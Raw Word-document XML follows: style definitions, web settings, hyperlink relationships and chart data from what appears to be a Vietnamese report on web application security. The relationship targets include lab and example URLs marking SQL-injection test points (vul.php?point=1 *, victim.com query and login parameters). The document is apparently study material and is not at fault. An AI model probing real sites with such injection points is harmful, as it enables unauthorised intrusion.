    <w:rsid w:val="00FC6730"/>
    <w:rsid w:val="00FC785D"/>
    <w:rsid w:val="00FE2A61"/>
    <w:rsid w:val="00FE3533"/>
    <w:rsid w:val="00FE627D"/>
    <w:rsid w:val="00FF02A4"/>
    <w:rsid w:val="00FF21E5"/>
    <w:rsid w:val="00FF35AF"/>
    <w:rsid w:val="00FF76BB"/>
    <w:rsid w:val="00FF7B8A"/>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BA55"/>
  <w15:docId w15:val="{C0BC1275-EC49-4927-996D-8CC23D81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702"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="312" w:lineRule="auto"/>
      <w:ind w:firstLine="720"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="00000A"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00C93A9C"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:szCs w:val="28"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E64461"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00817DAA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:outlineLvl w:val="2"/>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A9C"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:color w:val="00000A"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E64461"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00817DAA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="InternetLink">
    <w:name w:val="Internet Link"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FA077C"/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00B43D5A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:iCs/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B43D5A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B43D5A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel1">
    <w:name w:val="ListLabel 1"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel2">
    <w:name w:val="ListLabel 2"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel3">
    <w:name w:val="ListLabel 3"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel4">
    <w:name w:val="ListLabel 4"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel5">
    <w:name w:val="ListLabel 5"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel6">
    <w:name w:val="ListLabel 6"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel7">
    <w:name w:val="ListLabel 7"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading">
    <w:name w:val="Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="TextBody"/>
    <w:rsid w:val="009C7A9D"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:cs="FreeSans"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TextBody">
    <w:name w:val="Text Body"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009C7A9D"/>
    <w:pPr>
      <w:spacing w:after="140" w:line="288" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List">
    <w:name w:val="List"/>
    <w:basedOn w:val="TextBody"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00313D3F"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:iCs/>
      <w:color w:val="auto"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Index">
    <w:name w:val="Index"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009C7A9D"/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Caption"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00B43D5A"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="000000"/>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paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="002C321E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="007C72B3"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="720"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="00000A"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableContents">
    <w:name w:val="Table Contents"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009C7A9D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="PreformattedText">
    <w:name w:val="Preformatted Text"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009C7A9D"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00F02C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0"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:color w:val="00000A"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="DocumentMap">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="DocumentMapChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00673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E2"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:color w:val="00000A"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00586AE9"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00410F30"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="480" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="left"/>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qFormat/>
    <w:rsid w:val="0008594E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00004A70"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1540"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0008594E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003308DA"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CodeInBox">
    <w:name w:val="CodeInBox"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeInBoxChar"/>
    <w:qFormat/>
    <w:rsid w:val="00876FFE"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0032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rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeInBoxChar">
    <w:name w:val="CodeInBox Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CodeInBox"/>
    <w:rsid w:val="00876FFE"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00325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2167">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="512840958">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1919904622">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="59644367">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="983462007">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="689452492">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2064669799">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="14843094">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1077433373">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="250771982">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="622158227">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2083212820">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="86653903">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2096587503">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="79644084">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="871915898">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="817571756">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2115593582">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1223447108">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="561908772">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="866452320">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="103743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im.com/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/news/346"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news.cnet.com/8301-10784_3-9758843-7.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192.168.1.59/vul.php" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.59/vul.php?point=1%20*" TargetMode="External"/><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ww.victim.com/cms/login.php?username=foo&amp;password=bar" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/products.php?val=10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github.com/kendyhikaru/WETK/tree/master/WETK0.2" TargetMode="External"/><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ctim.com/products.php?val=10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0.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.phrack.com/issues.html?issue=54&amp;id=8" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityfocus.com/news/6194"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we.mitre.org/top25/index.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hyperlink" Target="http://www.ftc.gov/os/caselist/0523148/0523148complaint.pdf"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dài chuỗi</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B$2:$B$5</c:f>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-E9CD-42E1-BE12-D7595EBF7315}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Số yêu cầu</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C$2:$C$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>62</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>1</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-E9CD-42E1-BE12-D7595EBF7315}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:axId val="240076672"/>
        <c:axId val="240102784"/>
      </c:barChart>
      <c:lineChart>
        <c:grouping val="standard"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
